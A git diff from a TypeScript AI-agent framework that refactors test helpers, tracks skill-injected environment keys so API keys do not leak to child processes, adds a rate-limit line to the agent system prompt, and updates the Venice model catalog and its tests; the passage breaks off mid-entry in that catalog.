c283a653310..6ed1fc0b338 100644 --- a/src/agents/pi-model-discovery.ts +++ b/src/agents/pi-model-discovery.ts @@ -119,9 +119,10 @@ function createAuthStorage(AuthStorageLike: unknown, path: string, creds: PiCred ? withFactory.create(path) : new (AuthStorageLike as { new (path: string): unknown })(path) ) as PiAuthStorage & { - setRuntimeApiKey?: (provider: string, apiKey: string) => void; + setRuntimeApiKey?: (provider: string, apiKey: string) => void; // pragma: allowlist secret }; - if (typeof withRuntimeOverride.setRuntimeApiKey === "function") { + const hasRuntimeApiKeyOverride = typeof withRuntimeOverride.setRuntimeApiKey === "function"; // pragma: allowlist secret + if (hasRuntimeApiKeyOverride) { for (const [provider, credential] of Object.entries(creds)) { if (credential.type === "api_key") { withRuntimeOverride.setRuntimeApiKey(provider, credential.key); diff --git a/src/agents/pi-tool-definition-adapter.after-tool-call.fires-once.test.ts b/src/agents/pi-tool-definition-adapter.after-tool-call.fires-once.test.ts index 4fa66fb516f..927694d06b1 100644 --- a/src/agents/pi-tool-definition-adapter.after-tool-call.fires-once.test.ts +++ b/src/agents/pi-tool-definition-adapter.after-tool-call.fires-once.test.ts @@ -9,6 +9,7 @@ import type { AgentTool } from "@mariozechner/pi-agent-core"; import { Type } from "@sinclair/typebox"; import { beforeAll, beforeEach, describe, expect, it, vi } from "vitest"; +import { createBaseToolHandlerState } from "./pi-tool-handler-state.test-helpers.js"; const hookMocks = vi.hoisted(() => ({ runner: { @@ -75,17 +76,7 @@ function createToolHandlerCtx() { hookRunner: hookMocks.runner, state: { toolMetaById: new Map(), - toolMetas: [] as Array<{ toolName?: string; meta?: string }>, - toolSummaryById: new Set(), - lastToolError: undefined, - pendingMessagingTexts: new Map(), - pendingMessagingTargets: new Map(), - pendingMessagingMediaUrls: new Map(), - messagingToolSentTexts: [] as string[], - messagingToolSentTextsNormalized: [] as string[], - messagingToolSentMediaUrls: [] as string[], - messagingToolSentTargets: [] as unknown[], - blockBuffer: "", + ...createBaseToolHandlerState(), successfulCronAdds: 0, }, log: { debug: vi.fn(), warn: vi.fn() }, @@ -247,7 +238,10 @@ describe("after_tool_call fires exactly once in embedded runs", () => { result: { content: [{ type: "text", text: "ok" }] }, }); - expect(beforeToolCallMocks.consumeAdjustedParamsForToolCall).toHaveBeenCalledWith(toolCallId); + expect(beforeToolCallMocks.consumeAdjustedParamsForToolCall).toHaveBeenCalledWith( + toolCallId, + "integration-test", + ); const event = (hookMocks.runner.runAfterToolCall as ReturnType).mock .calls[0]?.[0] as { params?: unknown } | undefined; expect(event?.params).toEqual(adjusted); diff --git a/src/agents/pi-tool-handler-state.test-helpers.ts b/src/agents/pi-tool-handler-state.test-helpers.ts new file mode 100644 index 00000000000..0775299ab83 --- /dev/null +++ b/src/agents/pi-tool-handler-state.test-helpers.ts @@ -0,0 +1,15 @@ +export function createBaseToolHandlerState() { + return { + toolMetas: [] as Array<{ toolName?: string; meta?: string }>, + toolSummaryById: new Set(), + lastToolError: undefined, + pendingMessagingTexts: new Map(), + pendingMessagingTargets: new Map(), + pendingMessagingMediaUrls: new Map(), + messagingToolSentTexts: [] as string[], + messagingToolSentTextsNormalized: [] as string[], + messagingToolSentMediaUrls: [] as string[], + messagingToolSentTargets: [] as unknown[], + blockBuffer: "", + }; +} diff --git a/src/agents/sandbox/novnc-auth.ts b/src/agents/sandbox/novnc-auth.ts index ef1e78334b0..ee46617a840 100644 --- a/src/agents/sandbox/novnc-auth.ts +++ b/src/agents/sandbox/novnc-auth.ts @@ -1,6 +1,6 @@ import crypto from "node:crypto"; -export const NOVNC_PASSWORD_ENV_KEY = "OPENCLAW_BROWSER_NOVNC_PASSWORD"; +export const NOVNC_PASSWORD_ENV_KEY = "OPENCLAW_BROWSER_NOVNC_PASSWORD"; // pragma: allowlist secret const NOVNC_TOKEN_TTL_MS = 60 * 1000; const NOVNC_PASSWORD_LENGTH = 8; const NOVNC_PASSWORD_ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; diff --git a/src/agents/session-slug.ts b/src/agents/session-slug.ts index c15c9746e79..0aee27a344b 100644 --- a/src/agents/session-slug.ts +++ b/src/agents/session-slug.ts @@ -112,10 +112,12 @@ function createSlugBase(words = 2) { return parts.join("-"); } -export function createSessionSlug(isTaken?: (id: string) => boolean): string { - const isIdTaken = isTaken ?? (() => false); +function createAvailableSlug( + words: number, + isIdTaken: (id: string) => boolean, +): string | undefined { for (let attempt = 0; attempt < 12; attempt += 1) { - const base = createSlugBase(2); + const base = createSlugBase(words); if (!isIdTaken(base)) { return base; } @@ -126,17 +128,18 @@ export function createSessionSlug(isTaken?: (id: string) => boolean): string { } } } - for (let attempt = 0; attempt < 12; attempt += 1) { - const base = createSlugBase(3); - if (!isIdTaken(base)) { - return base; - } - for (let i = 2; i <= 12; i += 1) { - const candidate = `${base}-${i}`; - if (!isIdTaken(candidate)) { - return candidate; - } - } + return undefined; +} + +export function createSessionSlug(isTaken?: (id: string) => boolean): string { + const isIdTaken = isTaken ?? (() => false); + const twoWord = createAvailableSlug(2, isIdTaken); + if (twoWord) { + return twoWord; + } + const threeWord = createAvailableSlug(3, isIdTaken); + if (threeWord) { + return threeWord; } const fallback = `${createSlugBase(3)}-${Math.random().toString(36).slice(2, 5)}`; return isIdTaken(fallback) ? `${fallback}-${Date.now().toString(36)}` : fallback; diff --git a/src/agents/skills.test.ts b/src/agents/skills.test.ts index 33341e6ad1f..a444fceded4 100644 --- a/src/agents/skills.test.ts +++ b/src/agents/skills.test.ts @@ -12,6 +12,7 @@ import { buildWorkspaceSkillSnapshot, loadWorkspaceSkillEntries, } from "./skills.js"; +import { getActiveSkillEnvKeys } from "./skills/env-overrides.js"; const fixtureSuite = createFixtureSuite("openclaw-skills-suite-"); let tempHome: TempHomeEnv | null = null; @@ -256,9 +257,43 @@ describe("applySkillEnvOverrides", () => { try { expect(process.env.ENV_KEY).toBe("injected"); + expect(getActiveSkillEnvKeys().has("ENV_KEY")).toBe(true); } finally { restore(); expect(process.env.ENV_KEY).toBeUndefined(); + expect(getActiveSkillEnvKeys().has("ENV_KEY")).toBe(false); + } + }); + }); + + it("keeps env keys tracked until all overlapping overrides restore", async () => { + const workspaceDir = await makeWorkspace(); + const skillDir = path.join(workspaceDir, "skills", "env-skill"); + await writeSkill({ + dir: skillDir, + name: "env-skill", + description: "Needs env", + metadata: '{"openclaw":{"requires":{"env":["ENV_KEY"]},"primaryEnv":"ENV_KEY"}}', + }); + + const entries = loadWorkspaceSkillEntries(workspaceDir, resolveTestSkillDirs(workspaceDir)); + + withClearedEnv(["ENV_KEY"], () => { + const config = { skills: { entries: { "env-skill": { apiKey: "injected" } } } }; + const restoreFirst = applySkillEnvOverrides({ skills: entries, config }); + const restoreSecond = applySkillEnvOverrides({ skills: entries, config }); + + try { + expect(process.env.ENV_KEY).toBe("injected"); + expect(getActiveSkillEnvKeys().has("ENV_KEY")).toBe(true); + + restoreFirst(); + expect(process.env.ENV_KEY).toBe("injected"); + expect(getActiveSkillEnvKeys().has("ENV_KEY")).toBe(true); + } finally { + restoreSecond(); + expect(process.env.ENV_KEY).toBeUndefined(); + expect(getActiveSkillEnvKeys().has("ENV_KEY")).toBe(false); } }); }); diff --git a/src/agents/skills/env-overrides.runtime.ts b/src/agents/skills/env-overrides.runtime.ts new file mode 100644 index 00000000000..ab8c4b305fb --- /dev/null +++ b/src/agents/skills/env-overrides.runtime.ts @@ -0,0 +1 @@ +export { getActiveSkillEnvKeys } from "./env-overrides.js"; diff --git a/src/agents/skills/env-overrides.ts b/src/agents/skills/env-overrides.ts index 83bb559bc7c..f06ff942f8a 100644 --- a/src/agents/skills/env-overrides.ts +++ b/src/agents/skills/env-overrides.ts @@ -9,8 +9,66 @@ import type { SkillEntry, SkillSnapshot } from "./types.js"; const log = createSubsystemLogger("env-overrides"); -type EnvUpdate = { key: string; prev: string | undefined }; +type EnvUpdate = { key: string }; type SkillConfig = NonNullable>; +type ActiveSkillEnvEntry = { + baseline: string | undefined; + value: string; + count: number; +}; + +/** + * Tracks env var keys that are currently injected by skill overrides. + * Used by ACP harness spawn to strip skill-injected keys so they don't + * leak to child processes (e.g., OPENAI_API_KEY leaking to Codex CLI). + * @see https://github.com/openclaw/openclaw/issues/36280 + */ +const activeSkillEnvEntries = new Map(); + +/** Returns a snapshot of env var keys currently injected by skill overrides. */ +export function getActiveSkillEnvKeys(): ReadonlySet { + return new Set(activeSkillEnvEntries.keys()); +} + +function acquireActiveSkillEnvKey(key: string, value: string): boolean { + const active = activeSkillEnvEntries.get(key); + if (active) { + active.count += 1; + if (process.env[key] === undefined) { + process.env[key] = active.value; + } + return true; + } + if (process.env[key] !== undefined) { + return false; + } + activeSkillEnvEntries.set(key, { + baseline: process.env[key], + value, + count: 1, + }); + return true; +} + +function releaseActiveSkillEnvKey(key: string) { + const active = activeSkillEnvEntries.get(key); + if (!active) { + return; + } + active.count -= 1; + if (active.count > 0) { + if (process.env[key] === undefined) { + process.env[key] = active.value; + } + return; + } + activeSkillEnvEntries.delete(key); + if (active.baseline === undefined) { + delete process.env[key]; + } else { + process.env[key] = active.baseline; + } +} type SanitizedSkillEnvOverrides = { allowed: Record; @@ -99,7 +157,9 @@ function applySkillConfigEnvOverrides(params: { if (skillConfig.env) { for (const [rawKey, envValue] of Object.entries(skillConfig.env)) { const envKey = rawKey.trim(); - if (!envKey || !envValue || process.env[envKey]) { + const hasExternallyManagedValue = + process.env[envKey] !== undefined && !activeSkillEnvEntries.has(envKey); + if (!envKey || !envValue || hasExternallyManagedValue) { continue; } pendingOverrides[envKey] = envValue; @@ -111,7 +171,11 @@ function applySkillConfigEnvOverrides(params: { value: skillConfig.apiKey, path: `skills.entries.${skillKey}.apiKey`, }) ?? ""; - if (normalizedPrimaryEnv && resolvedApiKey && !process.env[normalizedPrimaryEnv]) { + const canInjectPrimaryEnv = + normalizedPrimaryEnv && + (process.env[normalizedPrimaryEnv] === undefined || + activeSkillEnvEntries.has(normalizedPrimaryEnv)); + if (canInjectPrimaryEnv && resolvedApiKey) { if (!pendingOverrides[normalizedPrimaryEnv]) { pendingOverrides[normalizedPrimaryEnv] = resolvedApiKey; } @@ -130,22 +194,18 @@ function applySkillConfigEnvOverrides(params: { } for (const [envKey, envValue] of Object.entries(sanitized.allowed)) { - if (process.env[envKey]) { + if (!acquireActiveSkillEnvKey(envKey, envValue)) { continue; } - updates.push({ key: envKey, prev: process.env[envKey] }); - process.env[envKey] = envValue; + updates.push({ key: envKey }); + process.env[envKey] = activeSkillEnvEntries.get(envKey)?.value ?? envValue; } } function createEnvReverter(updates: EnvUpdate[]) { return () => { for (const update of updates) { - if (update.prev === undefined) { - delete process.env[update.key]; - } else { - process.env[update.key] = update.prev; - } + releaseActiveSkillEnvKey(update.key); } }; } diff --git a/src/agents/skills/frontmatter.ts b/src/agents/skills/frontmatter.ts index dd82a7f73d5..43dc35aa578 100644 --- a/src/agents/skills/frontmatter.ts +++ b/src/agents/skills/frontmatter.ts @@ -2,6 +2,7 @@ import type { Skill } from "@mariozechner/pi-coding-agent"; import { validateRegistryNpmSpec } from "../../infra/npm-registry-spec.js"; import { parseFrontmatterBlock } from "../../markdown/frontmatter.js"; import { + applyOpenClawManifestInstallCommonFields, getFrontmatterString, normalizeStringList, parseOpenClawManifestInstallBase, @@ -113,19 +114,12 @@ function parseInstallSpec(input: unknown): SkillInstallSpec | undefined { return undefined; } const { raw } = parsed; - const spec: SkillInstallSpec = { - kind: parsed.kind as SkillInstallSpec["kind"], - }; - - if (parsed.id) { - spec.id = parsed.id; - } - if (parsed.label) { - spec.label = parsed.label; - } - if (parsed.bins) { - spec.bins = parsed.bins; - } + const spec = applyOpenClawManifestInstallCommonFields( + { + kind: parsed.kind as SkillInstallSpec["kind"], + }, + parsed, + ); const osList = normalizeStringList(raw.os); if (osList.length > 0) { spec.os = osList; diff --git a/src/agents/system-prompt.test.ts b/src/agents/system-prompt.test.ts index 57dfb26689c..64497364f8c 100644 --- a/src/agents/system-prompt.test.ts +++ b/src/agents/system-prompt.test.ts @@ -144,6 +144,9 @@ describe("buildAgentSystemPrompt", () => { expect(prompt).toContain("## Skills (mandatory)"); expect(prompt).toContain(""); + expect(prompt).toContain( + "When a skill drives external API writes, assume rate limits: prefer fewer larger writes, avoid tight one-item loops, serialize bursts when possible, and respect 429/Retry-After.", + ); }); it("omits skills in minimal prompt mode when skillsPrompt is absent", () => { diff --git a/src/agents/system-prompt.ts b/src/agents/system-prompt.ts index a60ae54306b..a3d593ab6b8 100644 --- a/src/agents/system-prompt.ts +++ b/src/agents/system-prompt.ts @@ -29,6 +29,7 @@ function buildSkillsSection(params: { skillsPrompt?: string; readToolName: strin "- If multiple could apply: choose the most specific one, then read/follow it.", "- If none clearly apply: do not read any SKILL.md.", "Constraints: never read more than one skill up front; only read after selecting.", + "- When a skill drives external API writes, assume rate limits: prefer fewer larger writes, avoid tight one-item loops, serialize bursts when possible, and respect 429/Retry-After.", trimmed, "", ]; diff --git a/src/agents/test-helpers/agent-message-fixtures.ts b/src/agents/test-helpers/agent-message-fixtures.ts index 455487e8c59..040be7f1dd8 100644 --- a/src/agents/test-helpers/agent-message-fixtures.ts +++ b/src/agents/test-helpers/agent-message-fixtures.ts @@ -1,20 +1,6 @@ import type { AgentMessage } from "@mariozechner/pi-agent-core"; -import type { AssistantMessage, ToolResultMessage, Usage, UserMessage } from "@mariozechner/pi-ai"; - -const ZERO_USAGE: Usage = { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - totalTokens: 0, - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - total: 0, - }, -}; +import type { AssistantMessage, ToolResultMessage, UserMessage } from "@mariozechner/pi-ai"; +import { ZERO_USAGE_FIXTURE } from "./usage-fixtures.js"; export function castAgentMessage(message: unknown): AgentMessage { return message as AgentMessage; @@ -42,7 +28,7 @@ export function makeAgentAssistantMessage( api: "openai-responses", provider: "openai", model: "test-model", - usage: ZERO_USAGE, + usage: ZERO_USAGE_FIXTURE, stopReason: "stop", timestamp: 0, ...overrides, diff --git a/src/agents/test-helpers/assistant-message-fixtures.ts b/src/agents/test-helpers/assistant-message-fixtures.ts index edf26770b77..72606a245ad 100644 --- a/src/agents/test-helpers/assistant-message-fixtures.ts +++ b/src/agents/test-helpers/assistant-message-fixtures.ts @@ -1,19 +1,5 @@ import type { AssistantMessage } from "@mariozechner/pi-ai"; - -const ZERO_USAGE: AssistantMessage["usage"] = { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - totalTokens: 0, - cost: { - input: 0, - output: 0, - cacheRead: 0, - cacheWrite: 0, - total: 0, - }, -}; +import { ZERO_USAGE_FIXTURE } from "./usage-fixtures.js"; export function makeAssistantMessageFixture( overrides: Partial = {}, @@ -24,7 +10,7 @@ export function makeAssistantMessageFixture( api: "openai-responses", provider: "openai", model: "test-model", - usage: ZERO_USAGE, + usage: ZERO_USAGE_FIXTURE, timestamp: 0, stopReason: "error", errorMessage: errorText, diff --git a/src/agents/test-helpers/usage-fixtures.ts b/src/agents/test-helpers/usage-fixtures.ts new file mode 100644 index 00000000000..5b292290c30 --- /dev/null +++ b/src/agents/test-helpers/usage-fixtures.ts @@ -0,0 +1,16 @@ +import type { Usage } from "@mariozechner/pi-ai"; + +export const ZERO_USAGE_FIXTURE: Usage = { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + totalTokens: 0, + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + total: 0, + }, +}; diff --git a/src/agents/tools/nodes-tool.test.ts b/src/agents/tools/nodes-tool.test.ts index 12ac63e4403..99780a16238 100644 --- a/src/agents/tools/nodes-tool.test.ts +++ b/src/agents/tools/nodes-tool.test.ts @@ -7,7 +7,7 @@ const gatewayMocks = vi.hoisted(() => ({ const nodeUtilsMocks = vi.hoisted(() => ({ resolveNodeId: vi.fn(async () => "node-1"), - listNodes: vi.fn(async () => []), + listNodes: vi.fn(async () => [] as Array<{ nodeId: string; commands?: string[] }>), resolveNodeIdFromList: vi.fn(() => "node-1"), })); @@ -85,4 +85,50 @@ describe("createNodesTool screen_record duration guardrails", () => { }), ); }); + + it("omits rawCommand when preparing wrapped argv execution", async () => { + nodeUtilsMocks.listNodes.mockResolvedValue([ + { + nodeId: "node-1", + commands: ["system.run"], + }, + ]); + gatewayMocks.callGatewayTool.mockImplementation(async (_method, _opts, payload) => { + if (payload?.command === "system.run.prepare") { + return { + payload: { + cmdText: "echo hi", + plan: { + argv: ["bash", "-lc", "echo hi"], + cwd: null, + rawCommand: null, + agentId: null, + sessionKey: null, + }, + }, + }; + } + if (payload?.command === "system.run") { + return { payload: { ok: true } }; + } + throw new Error(`unexpected command: ${String(payload?.command)}`); + }); + const tool = createNodesTool(); + + await tool.execute("call-1", { + action: "run", + node: "macbook", + command: ["bash", "-lc", "echo hi"], + }); + + const prepareCall = gatewayMocks.callGatewayTool.mock.calls.find( + (call) => call[2]?.command === "system.run.prepare", + )?.[2]; + expect(prepareCall).toBeTruthy(); + expect(prepareCall?.params).toMatchObject({ + command: ["bash", "-lc", "echo hi"], + agentId: "main", + }); + expect(prepareCall?.params).not.toHaveProperty("rawCommand"); + }); }); diff --git a/src/agents/tools/nodes-tool.ts b/src/agents/tools/nodes-tool.ts index b90d429119b..9c335c012b4 100644 --- a/src/agents/tools/nodes-tool.ts +++ b/src/agents/tools/nodes-tool.ts @@ -18,7 +18,6 @@ import { import { parseDurationMs } from "../../cli/parse-duration.js"; import type { OpenClawConfig } from "../../config/config.js"; import { parsePreparedSystemRunPayload } from "../../infra/system-run-approval-context.js"; -import { formatExecCommand } from "../../infra/system-run-command.js"; import { imageMimeFromFormat } from "../../media/mime.js"; import type { GatewayMessageChannel } from "../../utils/message-channel.js"; import { resolveSessionAgentId } from "../agent-scope.js"; @@ -651,7 +650,6 @@ export function createNodesTool(options?: { command: "system.run.prepare", params: { command, - rawCommand: formatExecCommand(command), cwd, agentId, sessionKey, diff --git a/src/agents/trace-base.ts b/src/agents/trace-base.ts new file mode 100644 index 00000000000..5b6ecefac77 --- /dev/null +++ b/src/agents/trace-base.ts @@ -0,0 +1,21 @@ +export type AgentTraceBase = { + runId?: string; + sessionId?: string; + sessionKey?: string; + provider?: string; + modelId?: string; + modelApi?: string | null; + workspaceDir?: string; +}; + +export function buildAgentTraceBase(params: AgentTraceBase): AgentTraceBase { + return { + runId: params.runId, + sessionId: params.sessionId, + sessionKey: params.sessionKey, + provider: params.provider, + modelId: params.modelId, + modelApi: params.modelApi, + workspaceDir: params.workspaceDir, + }; +} diff --git a/src/agents/venice-models.test.ts b/src/agents/venice-models.test.ts index 95fc7f61f8a..5a93568f9b7 100644 --- a/src/agents/venice-models.test.ts +++ b/src/agents/venice-models.test.ts @@ -42,6 +42,7 @@ function makeModelsResponse(id: string): Response { name: id, privacy: "private", availableContextTokens: 131072, + maxCompletionTokens: 4096, capabilities: { supportsReasoning: false, supportsVision: false, @@ -94,6 +95,239 @@ describe("venice-models", () => { expect(models.map((m) => m.id)).toContain("llama-3.3-70b"); }); + it("uses API maxCompletionTokens for catalog models when present", async () => { + const fetchMock = vi.fn( + async () => + new Response( + JSON.stringify({ + data: [ + { + id: "llama-3.3-70b", + model_spec: { + name: "llama-3.3-70b", + privacy: "private", + availableContextTokens: 131072, + maxCompletionTokens: 2048, + capabilities: { + supportsReasoning: false, + supportsVision: false, + supportsFunctionCalling: true, + }, + }, + }, + ], + }), + { + status: 200, + headers: { "Content-Type": "application/json" }, + }, + ), + ); + vi.stubGlobal("fetch", fetchMock as unknown as typeof fetch); + + const models = await runWithDiscoveryEnabled(() => discoverVeniceModels()); + const llama = models.find((m) => m.id === "llama-3.3-70b"); + expect(llama?.maxTokens).toBe(2048); + }); + + it("retains catalog maxTokens when the API omits maxCompletionTokens", async () => { + const fetchMock = vi.fn( + async () => + new Response( + JSON.stringify({ + data: [ + { + id: "qwen3-235b-a22b-instruct-2507", + model_spec: { + name: "qwen3-235b-a22b-instruct-2507", + privacy: "private", + availableContextTokens: 131072, + capabilities: { + supportsReasoning: false, + supportsVision: false, + supportsFunctionCalling: true, + }, + }, + }, + ], + }), + { + status: 200, + headers: { "Content-Type": "application/json" }, + }, + ), + ); + vi.stubGlobal("fetch", fetchMock as unknown as typeof fetch); + + const models = await runWithDiscoveryEnabled(() => discoverVeniceModels()); + const qwen = models.find((m) => m.id === "qwen3-235b-a22b-instruct-2507"); + expect(qwen?.maxTokens).toBe(16384); + }); + + it("disables tools for catalog models that do not support function calling", () => { + const model = buildVeniceModelDefinition( + VENICE_MODEL_CATALOG.find((entry) => entry.id === "deepseek-v3.2")!, + ); + expect(model.compat?.supportsTools).toBe(false); + }); + + it("uses a conservative bounded maxTokens value for new models", async () => { + const fetchMock = vi.fn( + async () => + new Response( + JSON.stringify({ + data: [ + { + id: "new-model-2026", + model_spec: { + name: "new-model-2026", + privacy: "private", + availableContextTokens: 50_000, + maxCompletionTokens: 200_000, + capabilities: { + supportsReasoning: false, + supportsVision: false, + supportsFunctionCalling: false, + }, + }, + }, + ], + }), + { + status: 200, + headers: { "Content-Type": "application/json" }, + }, + ), + ); + vi.stubGlobal("fetch", fetchMock as unknown as typeof fetch); + + const models = await runWithDiscoveryEnabled(() => discoverVeniceModels()); + const newModel = models.find((m) => m.id === "new-model-2026"); + expect(newModel?.maxTokens).toBe(50000); + expect(newModel?.maxTokens).toBeLessThanOrEqual(newModel?.contextWindow ?? Infinity); + expect(newModel?.compat?.supportsTools).toBe(false); + }); + + it("caps new-model maxTokens to the fallback context window when API context is missing", async () => { + const fetchMock = vi.fn( + async () => + new Response( + JSON.stringify({ + data: [ + { + id: "new-model-without-context", + model_spec: { + name: "new-model-without-context", + privacy: "private", + maxCompletionTokens: 200_000, + capabilities: { + supportsReasoning: false, + supportsVision: false, + supportsFunctionCalling: true, + }, + }, + }, + ], + }), + { + status: 200, + headers: { "Content-Type": "application/json" }, + }, + ), + ); + vi.stubGlobal("fetch", fetchMock as unknown as typeof fetch); + + const models = await runWithDiscoveryEnabled(() => discoverVeniceModels()); + const newModel = models.find((m) => m.id === "new-model-without-context"); + expect(newModel?.contextWindow).toBe(128000); + expect(newModel?.maxTokens).toBe(128000); + }); + + it("ignores missing capabilities on partial metadata instead of aborting discovery", async () => { + const fetchMock = vi.fn( + async () => + new Response( + JSON.stringify({ + data: [ + { + id: "llama-3.3-70b", + model_spec: { + name: "llama-3.3-70b", + privacy: "private", + availableContextTokens: 131072, + maxCompletionTokens: 2048, + }, + }, + { + id: "new-model-partial", + model_spec: { + name: "new-model-partial", + privacy: "private", + maxCompletionTokens: 2048, + }, + }, + ], + }), + { + status: 200, + headers: { "Content-Type": "application/json" }, + }, + ), + ); + vi.stubGlobal("fetch", fetchMock as unknown as typeof fetch); + + const models = await runWithDiscoveryEnabled(() => discoverVeniceModels()); + const knownModel = models.find((m) => m.id === "llama-3.3-70b"); + const partialModel = models.find((m) => m.id === "new-model-partial"); + expect(models).not.toHaveLength(VENICE_MODEL_CATALOG.length); + expect(knownModel?.maxTokens).toBe(2048); + expect(partialModel?.contextWindow).toBe(128000); + expect(partialModel?.maxTokens).toBe(2048); + expect(partialModel?.compat?.supportsTools).toBeUndefined(); + }); + + it("keeps known models discoverable when a row omits model_spec", async () => { + const fetchMock = vi.fn( + async () => + new Response( + JSON.stringify({ + data: [ + { + id: "llama-3.3-70b", + }, + { + id: "new-model-valid", + model_spec: { + name: "new-model-valid", + privacy: "private", + availableContextTokens: 32_000, + maxCompletionTokens: 2_048, + capabilities: { + supportsReasoning: false, + supportsVision: false, + supportsFunctionCalling: true, + }, + }, + }, + ], + }), + { + status: 200, + headers: { "Content-Type": "application/json" }, + }, + ), + ); + vi.stubGlobal("fetch", fetchMock as unknown as typeof fetch); + + const models = await runWithDiscoveryEnabled(() => discoverVeniceModels()); + const knownModel = models.find((m) => m.id === "llama-3.3-70b"); + const newModel = models.find((m) => m.id === "new-model-valid"); + expect(models).not.toHaveLength(VENICE_MODEL_CATALOG.length); + expect(knownModel?.maxTokens).toBe(4096); + expect(newModel?.contextWindow).toBe(32000); + expect(newModel?.maxTokens).toBe(2048); + }); + it("falls back to static catalog after retry budget is exhausted", async () => { const fetchMock = vi.fn(async () => { throw Object.assign(new TypeError("fetch failed"), { diff --git a/src/agents/venice-models.ts b/src/agents/venice-models.ts index b33b51c60a8..2e6dae6bac9 100644 --- a/src/agents/venice-models.ts +++ b/src/agents/venice-models.ts @@ -5,7 +5,7 @@ import { createSubsystemLogger } from "../logging/subsystem.js"; const log = createSubsystemLogger("venice-models"); export const VENICE_BASE_URL = "https://api.venice.ai/api/v1"; -export const VENICE_DEFAULT_MODEL_ID = "llama-3.3-70b"; +export const VENICE_DEFAULT_MODEL_ID = "kimi-k2-5"; export const VENICE_DEFAULT_MODEL_REF = `venice/${VENICE_DEFAULT_MODEL_ID}`; // Venice uses credit-based pricing, not per-token costs. @@ -17,6 +17,9 @@ export const VENICE_DEFAULT_COST = { cacheWrite: 0, }; +const VENICE_DEFAULT_CONTEXT_WINDOW = 128_000; +const VENICE_DEFAULT_MAX_TOKENS = 4096; +const VENICE_DISCOVERY_HARD_MAX_TOKENS = 131_072; const VENICE_DISCOVERY_TIMEOUT_MS = 10_000; const VENICE_DISCOVERY_RETRYABLE_HTTP_STATUS = new Set([408, 425, 429, 500, 502, 503, 504]); const VENICE_DISCOVERY_RETRYABLE_NETWORK_CODES = new Set([ @@ -59,8 +62,8 @@ export const VENICE_MODEL_CATALOG = [ name: "Llama 3.3 70B", reasoning: false, input: ["text"], - contextWindow: 131072, - maxTokens: 8192, + contextWindow: 128000, + maxTokens: 4096, privacy: "private", }, { @@ -68,8 +71,8 @@ export const VENICE_MODEL_CATALOG = [ name: "Llama 3.2 3B", reasoning: false, input: ["text"], - contextWindow: 131072, - maxTokens: 8192, + contextWindow: 128000, + maxTokens: 4096, privacy: "private", }, { @@ -77,8 +80,9 @@ export const VENICE_MODEL_CATALOG = [ name: "Hermes 3 Llama 3.1 405B", reasoning: false, input: ["text"], - contextWindow: 131072, - maxTokens: 8192, + contextWindow: 128000, + maxTokens: 16384, + supportsTools: false, privacy: "private", }, @@ -88,8 +92,8 @@ export const VENICE_MODEL_CATALOG = [ name: "Qwen3 235B Thinking", reasoning: true, input: ["text"], - contextWindow: 131072, - maxTokens: 8192, + contextWindow: 128000, + maxTokens: 16384, privacy: "private", }, { @@ -97,8 +101,8 @@ export const VENICE_MODEL_CATALOG = [ name: "Qwen3 235B Instruct", reasoning: false, input: ["text"], - contextWindow: 131072, - maxTokens: 8192, + contextWindow: 128000, + maxTokens: 16384, privacy: "private", }, { @@ -106,8 +110,26 @@ export const VENICE_MODEL_CATALOG = [ name: "Qwen3 Coder 480B", reasoning: false, input: ["text"], - contextWindow: 262144, - maxTokens: 8192, + contextWindow: 256000, + maxTokens: 65536, + privacy: "private", + }, + { + id: "qwen3-coder-480b-a35b-instruct-turbo", + name: "Qwen3 Coder 480B Turbo", + reasoning: false, + input: ["text"], + contextWindow: 256000, + maxTokens: 65536, + privacy: "private", + }, + { + id: "qwen3-5-35b-a3b", + name: "Qwen3.5 35B A3B", + reasoning: true, + input: ["text", "image"], + contextWindow: 256000, + maxTokens: 65536, privacy: "private", }, { @@ -115,8 +137,8 @@ export const VENICE_MODEL_CATALOG = [ name: "Qwen3 Next 80B", reasoning: false, input: ["text"], - contextWindow: 262144, - maxTokens: 8192, + contextWindow: 256000, + maxTokens: 16384, privacy: "private", }, { @@ -124,8 +146,8 @@ export const VENICE_MODEL_CATALOG = [ name: "Qwen3 VL 235B (Vision)", reasoning: false, input: ["text", "image"], - contextWindow: 262144, - maxTokens: 8192, + contextWindow: 256000, + maxTokens: 16384, privacy: "private", }, { @@ -133,8 +155,8 @@ export const VENICE_MODEL_CATALOG = [ name: "Venice Small (Qwen3 4B)", reasoning: true, input: ["text"], - contextWindow: 32768, - maxTokens: 8192, + contextWindow: 32000, + maxTokens: 4096, privacy: "private", }, @@ -144,8 +166,9 @@ export const VENICE_MODEL_CATALOG = [ name: "DeepSeek V3.2", reasoning: true, input: ["text"], - contextWindow: 163840, - maxTokens: 8192, + contextWindow: 160000, + maxTokens: 32768, + supportsTools: false, privacy: "private", }, @@ -155,8 +178,9 @@ export const VENICE_MODEL_CATALOG = [ name: "Venice Uncensored (Dolphin-Mistral)", reasoning: false, input: ["text"], - contextWindow: 32768, - maxTokens: 8192, + contextWindow: 32000, + maxTokens: 4096, + supportsTools: false, privacy: "private", }, { @@ -164,8 +188,8 @@ export const VENICE_MODEL_CATALOG = [ name: "Venice Medium (Mistral)", reasoning: false, input: ["text", "image"], - contextWindow: 131072, - maxTokens: 8192, + contextWindow: 128000, + maxTokens: 4096, privacy: "private", }, @@ -175,8 +199,8 @@ export const VENICE_MODEL_CATALOG = [ name: "Google Gemma 3 27B Instruct", reasoning: false, input: ["text", "image"], - contextWindow: 202752, - maxTokens: 8192, + contextWindow: 198000, + maxTokens: 16384, privacy: "private", }, { @@ -184,8 +208,35 @@ export const VENICE_MODEL_CATALOG = [ name: "OpenAI GPT OSS 120B", reasoning: false, input: ["text"], - contextWindow: 131072, - maxTokens: 8192, + contextWindow: 128000, + maxTokens: 16384, + privacy: "private", + }, + { + id: "nvidia-nemotron-3-nano-30b-a3b", + name: "NVIDIA Nemotron 3 Nano 30B", + reasoning: false, + input: ["text"], + contextWindow: 128000, + maxTokens: 16384, + privacy: "private", + }, + { + id: "olafangensan-glm-4.7-flash-heretic", + name: "GLM 4.7 Flash Heretic", + reasoning: true, + input: ["text"], + contextWindow: 128000, + maxTokens: 24000, + privacy: "private", + }, + { + id: 